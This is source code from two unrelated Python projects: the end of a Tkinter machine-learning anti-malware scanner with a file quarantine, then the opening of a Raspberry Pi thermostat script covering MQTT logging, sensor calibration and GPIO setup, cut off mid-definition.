text_box.insert(END, "[ + ] No files in quarantine\n", "positive")
text_box.tag_config('positive', foreground="green")
text_box.see(END)
text_box.update()
else:
text_box.insert(END, "[ + ] Files in quarantine:\n", "positive")
text_box.tag_config('positive', foreground="green")
text_box.see(END)
text_box.update()
for i in terminations:
text_box.insert(END, "[ * ] " + i + "\n", "info")
text_box.tag_config("info", background = "red")
text_box.see(END)
text_box.update()
li.insert(END, i)
li.update()
b_delete_all["command"] =lambda:button_action_handler("delete_all")
b_delete["command"] = lambda:button_action_handler("delete")
b_restore["command"] = lambda:button_action_handler("restore")
b_restore_all["command"] = lambda:button_action_handler("restore_all")
b_add_file["command"] = lambda:button_action_handler("add_file")
def delete(file, ALL):
global li
global text_box
global terminations
if len(terminations) != 0:
if ALL == 1:
for i in range(len(terminations)):
os.remove(terminations[i])
text_box.insert(END, "[ + ] Deletion successful: \n" + terminations[i] + "\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
li.delete(0, len(terminations[i]))
li.update()
elif ALL == 0:
os.remove(file)
li.delete(ACTIVE, len(file))
li.update()
text_box.insert(END, "[ + ] Deletion successful:\n" + file + "\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
terminations = glob.glob(quarantine_folder)
for i in terminations:
li.insert(END, i)
li.update()
else:
text_box.insert(END, "[ - ] Unable to locate any files\n", "negative")
text_box.tag_config("negative", foreground="red")
text_box.see(END)
text_box.update()
def restore(file, ALL):
global li
global text_box
global terminations
if len(terminations) != 0:
if ALL == 1:
for i in range(len(terminations)):
quarantaene.decode_base64(terminations[i])
text_box.insert(END, "[ + ] Successfully restored\n" + terminations[i] + "\n", 'positive')
text_box.tag_config('positive', foreground="green")
text_box.see(END)
text_box.update()
li.delete(0, len(terminations[i]))
li.update()
elif ALL == 0:
quarantaene.decode_base64(file)
li.delete(ACTIVE, len(file))
text_box.insert(END, "[ + ] Successfully restored\n" + file + "\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
terminations = glob.glob(quarantine_folder)
for i in terminations:
li.insert(END, i)
li.update()
else:
text_box.insert(END, "[ - ] Unable to locate any files\n", "negative")
text_box.tag_config("negative", foreground="red")
text_box.see(END)
text_box.update()
def add_file_to_quarantine():
global li
global terminations
file = askopenfilename()
quarantaene.encode_base64(file, file_to_quarantine)
text_box.insert(END, "[ + ] Moved to quarantine:\n" + file + "\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
li.update()
k = 0
while True:
tmp = len(li.get(k))
if tmp == 0:
break
else:
li.delete(0, tmp)
k += 1
li.update()
terminations = glob.glob(quarantine_folder)
for i in terminations:
li.insert(END, i)
li.update()
def automatic_scan(path):
global text_box
global md5hash
match = False
file = path
start = time.time()
text_box.insert(END, "[ * ] Scanning " + file + "\n")
text_box.see(END)
text_box.update()
clf = joblib.load(os.path.join(classifier,'classifier.pkl'))
features = pickle.loads(open(os.path.join(classifier,'features.pkl'),'rb').read())
data = extract_infos(file)
if(len(list(data))==0):
text_box.insert(END, "[ * ] Not a PE file. " + "\n")
text_box.see(END)
text_box.update()
else:
pe_features = list(map(lambda x: data[x], features))
res = clf.predict([pe_features])[0]
if(res==0):
match=True
try:
f = open(file, "rb")
content = f.read()
f.close()
content = create_md5(content)
md5hash=content.decode("utf-8")
text_box.insert(END, "MD5-Hash: " + md5hash + "\n")
text_box.see(END)
text_box.update()
except MemoryError:
text_box.insert(END, "[ - ] Unable to create MD5-Hash:\n----->MemoryError!\n", 'negative')
text_box.insert(END, "[ ! ] Only select files under 1 GB\n", "negative")
text_box.tag_config('negative', foreground="red")
text_box.see(END)
text_box.update()
return None
except Exception as e:
text_box.insert(END, "[ ! ] Unable to handle problem\n[ ! ] Try again/file might be corrupted\n", "negative")
text_box.tag_config('negative', foreground="red")
text_box.see(END)
text_box.update()
return None
text_box.insert(END, "[ * ] Scan duration: {0}\n".format(round(time.time()-start, 2)))
text_box.see(END)
text_box.update()
if (match==True):
quarantaene.encode_base64(file, file_to_quarantine)
text_box.insert(END, "[ ! ] Threat found\n[ ! ] File was moved into quarantine\n", "important")
text_box.tag_config("important", foreground="red")
text_box.see(END)
text_box.update()
else:
text_box.insert(END, "[ + ] No threat was found\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
def scan():
global text_box
global md5hash
match = False
file = askopenfilename()
start = time.time()
text_box.insert(END, "[ * ] Scanning " + file + "\n")
text_box.see(END)
text_box.update()
clf = joblib.load(os.path.join(classifier,'classifier.pkl'))
features = pickle.loads(open(os.path.join(classifier,'features.pkl'),'rb').read())
data = extract_infos(file)
if(len(list(data))==0):
text_box.insert(END, "[ * ] Not a PE file. " + "\n")
text_box.see(END)
text_box.update()
else:
pe_features = list(map(lambda x: data[x], features))
res = clf.predict([pe_features])[0]
if(res==0):
match=True
try:
f = open(file, "rb")
content = f.read()
f.close()
content = create_md5(content)
md5hash=content.decode("utf-8")
text_box.insert(END, "MD5-Hash: " + md5hash + "\n")
text_box.see(END)
text_box.update()
except MemoryError:
text_box.insert(END, "[ - ] Unable to create MD5-Hash:\n----->MemoryError!\n", 'negative')
text_box.insert(END, "[ ! ] Only select files under 1 GB\n", "negative")
text_box.tag_config('negative', foreground="red")
text_box.see(END)
text_box.update()
return None
except Exception as e:
text_box.insert(END, "[ ! ] Unable to handle problem\n[ ! ] Try again/file might be corrupted\n", "negative")
text_box.tag_config('negative', foreground="red")
text_box.see(END)
text_box.update()
return None
text_box.insert(END, "[ * ] Scan duration: {0}\n".format(round(time.time()-start, 2)))
text_box.see(END)
text_box.update()
if (match==True):
quarantaene.encode_base64(file, file_to_quarantine)
text_box.insert(END, "[ ! ] Threat found\n[ ! ] File was moved into quarantine\n", "important")
text_box.tag_config("important", foreground="red")
text_box.see(END)
text_box.update()
else:
text_box.insert(END, "[ + ] No threat was found\n", "positive")
text_box.tag_config("positive", foreground="green")
text_box.see(END)
text_box.update()
def create_md5(content):
md = hashlib.md5()
md.update(content)
return bytes(md.hexdigest(), "utf-8")
def update():
global text_box
def closing():
main.destroy()
sys.exit()
def button_action_handler(s):
global text_box
global b_delete
global b_delete_all
global b_restore
global b_restore_all
global b_add_file
global li
if s == "delete":
tb = Thread(target=delete, args=(li.get(ACTIVE),0))
tb.start()
if s == "delete_all":
tb = Thread(target=delete, args=(0,1))
tb.start()
if s == "restore":
tb = Thread(target=restore, args=(li.get(ACTIVE),0))
tb.start()
if s == "restore_all":
tb = Thread(target=restore, args=(0,1))
tb.start()
if s == "add_file":
tb = Thread(target=add_file_to_quarantine)
tb.start()
if s == "details_button":
tb = Thread(target=detailedReport)
tb.start()
if s == "scan_button":
tb = Thread(target=scan)
tb.start()
if s == "update_button":
tb = Thread(target=update)
tb.start()
if s == "quarantine_button":
if li.winfo_viewable() == 0:
b_delete.place(x = 605, y = 61)
b_delete_all.place(x = 605, y = 86)
b_restore.place(x = 605, y = 111)
b_restore_all.place(x = 605, y = 136)
b_add_file.place(x = 605, y = 161)
li.place(x = 605, y = 0)
tb = Thread(target=quarantine)
tb.start()
if li.winfo_viewable() == 1:
b_delete.place_forget()
b_delete_all.place_forget()
b_restore.place_forget()
b_restore_all.place_forget()
b_add_file.place_forget()
li.place_forget()
if s == "quit_button":
tb = Thread(target=closing)
tb.start()
def gui_thread():
global main
global update_button
global scan_button
global url_scan_button
global url_scan_button
global quit_button
global text_box
global li
global b_delete
global b_delete_all
global b_restore
global b_restore_all
global b_add_file
main = tkinter.Tk()
main.title("MLAntiMalware")
main.wm_iconbitmap("")
main.geometry("800x192")
main.resizable(False, False)
hoehe = 2
breite = 16
scan_button = tkinter.Button(main,text = "Scan", command=lambda:button_action_handler("scan_button"), height = hoehe, width = breite)
scan_button.grid(row = 0, column = 0)
update_button = tkinter.Button(main,text = "Update", command=lambda:button_action_handler("update_button"), height = hoehe, width = breite)
update_button.grid(row = 1, column = 0)
quarantine_button = tkinter.Button(main,text = "Quarantine", command=lambda:button_action_handler("quarantine_button"), height = hoehe, width = breite)
quarantine_button.grid(row = 3, column = 0)
quit_button = tkinter.Button(main,text = "Close", command=lambda:button_action_handler("quit_button"), height = hoehe, width = breite)
quit_button.grid(row = 4, column = 0, sticky="w")
b_delete = tkinter.Button(main,text = "Remove current", height=0, width = 21, justify=CENTER)
b_delete_all = tkinter.Button(main,text = "Remove all", height = 0, width = 21, justify=CENTER)
b_restore = tkinter.Button(main,text = "Restore current", height=0, width = 21, justify=CENTER)
b_restore_all = tkinter.Button(main,text = "Restore all", height = 0, width = 21, justify=CENTER)
b_add_file = tkinter.Button(main,text = "Add file", height = 0, width = 21, justify=CENTER)
b_delete.place(x = 605, y = 61)
b_delete_all.place(x = 605, y = 86)
b_restore.place(x = 605, y = 111)
b_restore_all.place(x = 605, y = 136)
b_add_file.place(x = 605, y = 161)
b_delete.place_forget()
b_delete_all.place_forget()
b_restore.place_forget()
b_restore_all.place_forget()
b_add_file.place_forget()
text_box = tkinter.scrolledtext.ScrolledText(main)
text_box.place(height = 192, width = 454,x = 153, y = 0)
li = tkinter.Listbox(main, height=3, width = 24)
li.place(x = 605, y = 3)
li.place_forget()
text_box.insert(END, "Your System is Protected\n", "VIP")
text_box.tag_config("VIP", background='yellow')
text_box.insert(END, "[ + ] Preparing the program\n", 'positive')
text_box.tag_config('positive', foreground='green')
text_box.see(END)
text_box.update()
list_of_files = glob.glob(transfer)
if(len(list_of_files)>0):
latest_file = max(list_of_files, key=os.path.getctime)
automatic_scan(latest_file)
main.mainloop()
t_main = Thread(target=gui_thread)
t_main.start()
|
thermostat.py | ### BEGIN LICENSE
# Copyright (c) 2015 Andrzej Taramina <andrzej@chaeron.com>
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
### END LICENSE
##############################################################################
# #
# Core Imports #
# #
##############################################################################
import threading
import math
import os, os.path, sys
import time
import datetime
import urllib2
import json
import random
import socket
import re
##############################################################################
# #
# Kivy UI Imports #
# #
##############################################################################
import kivy
kivy.require( '1.9.0' ) # replace with your current kivy version !
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.slider import Slider
from kivy.clock import Clock
from kivy.graphics import Color, Rectangle
from kivy.storage.jsonstore import JsonStore
from kivy.uix.screenmanager import ScreenManager, Screen, NoTransition
##############################################################################
# #
# Other Imports #
# #
##############################################################################
import cherrypy
import schedule
##############################################################################
# #
# GPIO & Simulation Imports #
# #
##############################################################################
try:
import RPi.GPIO as GPIO
except ImportError:
import FakeRPi.GPIO as GPIO
##############################################################################
# #
# Sensor Imports #
# #
##############################################################################
#from w1thermsensor import W1ThermSensor
import smbus
import time
##############################################################################
# #
# MQTT Imports (used for logging and/or external sensors) #
# #
##############################################################################
try:
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
mqttAvailable = True
except ImportError:
mqttAvailable = False
##############################################################################
# #
# Utility classes #
# #
##############################################################################
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##############################################################################
# #
# MySensor.org Controller compatible translated constants #
# #
##############################################################################
MSG_TYPE_SET = "set"
MSG_TYPE_PRESENTATION = "presentation"
CHILD_DEVICE_NODE = "node"
CHILD_DEVICE_MQTT = "mqtt"
CHILD_DEVICE_UICONTROL_HEAT = "heatControl"
CHILD_DEVICE_UICONTROL_COOL = "coolControl"
CHILD_DEVICE_UICONTROL_FAN = "fanControl"
CHILD_DEVICE_UICONTROL_HOLD = "holdControl"
CHILD_DEVICE_UICONTROL_SLIDER = "tempSlider"
CHILD_DEVICE_WEATHER_CURR = "weatherCurrent"
CHILD_DEVICE_WEATHER_FCAST_TODAY = "weatherForecastToday"
CHILD_DEVICE_WEATHER_FCAST_TOMO = "weatherForecastTomorrow"
CHILD_DEVICE_HEAT = "heat"
CHILD_DEVICE_COOL = "cool"
CHILD_DEVICE_FAN = "fan"
CHILD_DEVICE_PIR = "motionSensor"
CHILD_DEVICE_TEMP = "temperatureSensor"
CHILD_DEVICE_SCREEN = "screen"
CHILD_DEVICE_SCHEDULER = "scheduler"
CHILD_DEVICE_WEBSERVER = "webserver"
CHILD_DEVICES = [
CHILD_DEVICE_NODE,
CHILD_DEVICE_MQTT,
CHILD_DEVICE_UICONTROL_HEAT,
CHILD_DEVICE_UICONTROL_COOL,
CHILD_DEVICE_UICONTROL_FAN,
CHILD_DEVICE_UICONTROL_HOLD,
CHILD_DEVICE_UICONTROL_SLIDER,
CHILD_DEVICE_WEATHER_CURR,
CHILD_DEVICE_WEATHER_FCAST_TODAY,
CHILD_DEVICE_WEATHER_FCAST_TOMO,
CHILD_DEVICE_HEAT,
CHILD_DEVICE_COOL,
CHILD_DEVICE_FAN,
CHILD_DEVICE_PIR,
CHILD_DEVICE_TEMP,
CHILD_DEVICE_SCREEN,
CHILD_DEVICE_SCHEDULER,
CHILD_DEVICE_WEBSERVER
]
CHILD_DEVICE_SUFFIX_UICONTROL = "Control"
MSG_SUBTYPE_NAME = "sketchName"
MSG_SUBTYPE_VERSION = "sketchVersion"
MSG_SUBTYPE_BINARY_STATUS = "binaryStatus"
MSG_SUBTYPE_TRIPPED = "armed"
MSG_SUBTYPE_ARMED = "tripped"
MSG_SUBTYPE_TEMPERATURE = "temperature"
MSG_SUBTYPE_FORECAST = "forecast"
MSG_SUBTYPE_CUSTOM = "custom"
MSG_SUBTYPE_TEXT = "text"
##############################################################################
# #
# Settings #
# #
##############################################################################
THERMOSTAT_VERSION = "1.9.9"
# Debug settings
debug = False
useTestSchedule = False
# Threading Locks
thermostatLock = threading.RLock()
weatherLock = threading.Lock()
scheduleLock = threading.RLock()
# Thermostat persistent settings
settings = JsonStore( "thermostat_settings.json" )
state = JsonStore( "thermostat_state.json" )
# MQTT settings/setup
def mqtt_on_connect( client, userdata, flags, rc ):
global mqttReconnect
print( "MQTT Connected with result code: " + str( rc ) )
if rc == 0:
if mqttReconnect:
log( LOG_LEVEL_STATE, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Reconnected to: " + mqttServer + ":" + str( mqttPort ) )
else:
mqttReconnect = True
log( LOG_LEVEL_STATE, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Connected to: " + mqttServer + ":" + str( mqttPort ) )
src = client.subscribe( [
( mqttSub_restart, 0 ), # Subscribe to restart commands
( mqttSub_loglevel, 0 ), # Subscribe to log level commands
( mqttSub_version, 0 ) # Subscribe to version commands
] )
if src[ 0 ] == 0:
log( LOG_LEVEL_INFO, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Subscribe Succeeded: " + mqttServer + ":" + str( mqttPort ) )
else:
log( LOG_LEVEL_ERROR, CHILD_DEVICE_MQTT, MSG_SUBTYPE_TEXT, "Subscribe FAILED, result code: " + src[ 0 ] )
if mqttAvailable:
mqttReconnect = False
mqttEnabled = False if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "enabled" ]
mqttClientID = 'thermostat' if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "clientID" ]
mqttServer = 'localhost' if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "server" ]
mqttPort = 1883 if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "port" ]
mqttPubPrefix = "thermostat" if not( settings.exists( "mqtt" ) ) else settings.get( "mqtt" )[ "pubPrefix" ]
mqttSub_version = str( mqttPubPrefix + "/" + mqttClientID + "/command/version" )
mqttSub_restart = str( mqttPubPrefix + "/" + mqttClientID + "/command/restart" )
mqttSub_loglevel = str( mqttPubPrefix + "/" + mqttClientID + "/command/loglevel" )
else:
mqttEnabled = False
if mqttEnabled:
mqttc = mqtt.Client( mqttClientID )
mqttc.on_connect = mqtt_on_connect
mqttc.message_callback_add( mqttSub_restart, lambda client, userdata, message: restart() )
mqttc.message_callback_add( mqttSub_loglevel, lambda client, userdata, message: setLogLevel( message ) )
mqttc.message_callback_add( mqttSub_version, lambda client, userdata, message: getVersion() )
# Logging settings/setup
LOG_FILE_NAME = "thermostat.log"
LOG_ALWAYS_TIMESTAMP = True
LOG_LEVEL_DEBUG = 1
LOG_LEVEL_INFO = 2
LOG_LEVEL_ERROR = 3
LOG_LEVEL_STATE = 4
LOG_LEVEL_NONE = 5
LOG_LEVELS = {
"debug": LOG_LEVEL_DEBUG,
"info": LOG_LEVEL_INFO,
"state": LOG_LEVEL_STATE,
"error": LOG_LEVEL_ERROR
}
LOG_LEVELS_STR = { v: k for k, v in LOG_LEVELS.items() }
logFile = None
def log_dummy( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
pass
def log_mqtt( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
if level >= logLevel:
ts = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " ) if LOG_ALWAYS_TIMESTAMP or timestamp else ""
topic = mqttPubPrefix + "/sensor/log/" + LOG_LEVELS_STR[ level ] + "/" + mqttClientID + "/" + child_device + "/" + msg_type + "/" + msg_subtype
payload = ts + msg
if single:
publish.single( topic, payload, hostname=mqttServer, port=mqttPort, client_id=mqttClientID )
else:
mqttc.publish( topic, payload )
def log_file( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
if level >= logLevel:
ts = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " )
logFile.write( ts + LOG_LEVELS_STR[ level ] + "/" + child_device + "/" + msg_type + "/" + msg_subtype + ": " + msg + "\n" )
def log_print( level, child_device, msg_subtype, msg, msg_type=MSG_TYPE_SET, timestamp=True, single=False ):
if level >= logLevel:
ts = datetime.datetime.now().strftime( "%Y-%m-%dT%H:%M:%S%z " ) if LOG_ALWAYS_TIMESTAMP or timestamp else ""
print( ts + LOG_LEVELS_STR[ level ] + "/" + child_device + "/" + msg_type + "/" + msg_subtype + ": " + msg )
loggingChannel = "none" if not( settings.exists( "logging" ) ) else settings.get( "logging" )[ "channel" ]
loggingLevel = "state" if not( settings.exists( "logging" ) ) else settings.get( "logging" )[ "level" ]
for case in switch( loggingChannel ):
if case( 'none' ):
log = log_dummy
break
if case( 'mqtt' ):
if mqttEnabled:
log = log_mqtt
else:
log = log_dummy
break
if case( 'file' ):
log = log_file
logFile = open( LOG_FILE_NAME, "a", 0 )
break
if case( 'print' ):
log = log_print
break
if case(): # default
log = log_dummy
logLevel = LOG_LEVELS.get( loggingLevel, LOG_LEVEL_NONE )
if mqttEnabled:
# Make sure we can reach the mqtt server by pinging it
pingCount = 0;
pingCmd = "ping -c 1 " + mqttServer
while os.system( pingCmd ) != 0 and pingCount <= 100:
++pingCount
time.sleep( 1 )
mqttc.connect( mqttServer, mqttPort )
mqttc.loop_start()
# Send presentations for Node
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_NAME, "Thermostat Starting Up...", msg_type=MSG_TYPE_PRESENTATION )
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_VERSION, THERMOSTAT_VERSION, msg_type=MSG_TYPE_PRESENTATION )
#send presentations for all other child "sensors"
for i in range( len( CHILD_DEVICES ) ):
child = CHILD_DEVICES[ i ]
if child != CHILD_DEVICE_NODE:
log( LOG_LEVEL_STATE, child, child, "", msg_type=MSG_TYPE_PRESENTATION )
# Various temperature settings:
tempScale = settings.get( "scale" )[ "tempScale" ]
scaleUnits = "c" if tempScale == "metric" else "f"
precipUnits = " mm" if tempScale == "metric" else '"'
precipFactor = 1.0 if tempScale == "metric" else 0.0393701
precipRound = 0 if tempScale == "metric" else 1
#sensorUnits = W1ThermSensor.DEGREES_C if tempScale == "metric" else W1ThermSensor.DEGREES_F
windFactor = 3.6 if tempScale == "metric" else 1.0
windUnits = " km/h" if tempScale == "metric" else " mph"
TEMP_TOLERANCE = 0.1 if tempScale == "metric" else 0.18
currentTemp = 22.0 if tempScale == "metric" else 72.0
priorCorrected = -100.0
setTemp = 22.0 if not( state.exists( "state" ) ) else state.get( "state" )[ "setTemp" ]
#tempHysteresis = 0.5 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempHysteresis" ]
tempHysteresis = 1
tempCheckInterval = 3 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempCheckInterval" ]
minUIEnabled = 0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minUIEnabled" ]
minUITimeout = 3 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minUITimeout" ]
minUITimer = None
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempScale", str( tempScale ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/scaleUnits", str( scaleUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/precipUnits", str( precipUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/precipFactor", str( precipFactor ), timestamp=False )
#log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/sensorUnits", str( sensorUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/windFactor", str( windFactor ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/windUnits", str( windUnits ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/currentTemp", str( currentTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/setTemp", str( setTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempHysteresis", str( tempHysteresis ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/tempCheckInterval", str( tempCheckInterval ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/minUIEnabled", str( minUIEnabled ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/temperature/minUITimeout", str( minUITimeout ), timestamp=False )
# Temperature calibration settings:
elevation = 0 if not( settings.exists( "thermostat" ) ) else settings.get( "calibration" )[ "elevation" ]
boilingPoint = ( 100.0 - 0.003353 * elevation ) if tempScale == "metric" else ( 212.0 - 0.00184 * elevation )
freezingPoint = 0.01 if tempScale == "metric" else 32.018
referenceRange = boilingPoint - freezingPoint
boilingMeasured = settings.get( "calibration" )[ "boilingMeasured" ]
freezingMeasured = settings.get( "calibration" )[ "freezingMeasured" ]
measuredRange = boilingMeasured - freezingMeasured
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/elevation", str( elevation ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/boilingPoint", str( boilingPoint ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/freezingPoint", str( freezingPoint ), timestamp=False )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/referenceRange", str( referenceRange ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/boilingMeasured", str( boilingMeasured ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/freezingMeasured", str( freezingMeasured ), timestamp=False )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/calibration/measuredRange", str( measuredRange ), timestamp=False )
# UI Slider settings:
minTemp = 15.0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "minTemp" ]
maxTemp = 30.0 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "maxTemp" ]
tempStep = 0.5 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "tempStep" ]
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/minTemp", str( minTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/maxTemp", str( maxTemp ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/UISlider/tempStep", str( tempStep ), timestamp=False )
try:
tempSensor = 1
except:
tempSensor = None
# PIR (Motion Sensor) setup:
pirEnabled = 0 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirEnabled" ]
pirPin = 5 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirPin" ]
pirCheckInterval = 0.5 if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirCheckInterval" ]
pirIgnoreFromStr = "00:00" if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirIgnoreFrom" ]
pirIgnoreToStr = "00:00" if not( settings.exists( "pir" ) ) else settings.get( "pir" )[ "pirIgnoreTo" ]
pirIgnoreFrom = datetime.time( int( pirIgnoreFromStr.split( ":" )[ 0 ] ), int( pirIgnoreFromStr.split( ":" )[ 1 ] ) )
pirIgnoreTo = datetime.time( int( pirIgnoreToStr.split( ":" )[ 0 ] ), int( pirIgnoreToStr.split( ":" )[ 1 ] ) )
log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_ARMED, str( pirEnabled ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/checkInterval", str( pirCheckInterval ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/ignoreFrom", str( pirIgnoreFromStr ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/pir/ignoreTo", str( pirIgnoreToStr ), timestamp=False )
# GPIO Pin setup and utility routines:
coolPin = 18 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "coolPin" ]
heatPin = 23 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "heatPin" ]
fanPin = 25 if not( settings.exists( "thermostat" ) ) else settings.get( "thermostat" )[ "fanPin" ]
GPIO.setmode( GPIO.BCM )
GPIO.setup( coolPin, GPIO.OUT )
GPIO.output( coolPin, GPIO.LOW )
GPIO.setup( heatPin, GPIO.OUT )
GPIO.output( heatPin, GPIO.LOW )
GPIO.setup( fanPin, GPIO.OUT )
GPIO.output( fanPin, GPIO.LOW )
if pirEnabled:
GPIO.setup( pirPin, GPIO.IN )
CHILD_DEVICE_HEAT = "heat"
CHILD_DEVICE_COOL = "cool"
CHILD_DEVICE_FAN = "fan"
log( LOG_LEVEL_INFO, CHILD_DEVICE_COOL, MSG_SUBTYPE_BINARY_STATUS, str( coolPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_HEAT, MSG_SUBTYPE_BINARY_STATUS, str( heatPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_FAN, MSG_SUBTYPE_BINARY_STATUS, str( fanPin ), timestamp=False )
log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, str( pirPin ), timestamp=False )
##############################################################################
# #
# UI Controls/Widgets #
# #
##############################################################################
controlColours = {
"normal": ( 1.0, 1.0, 1.0, 1.0 ),
"Cool": ( 0.0, 0.0, 1.0, 0.4 ),
"Heat": ( 1.0, 0.0, 0.0, 1.0 ),
"Fan": ( 0.0, 1.0, 0.0, 0.4 ),
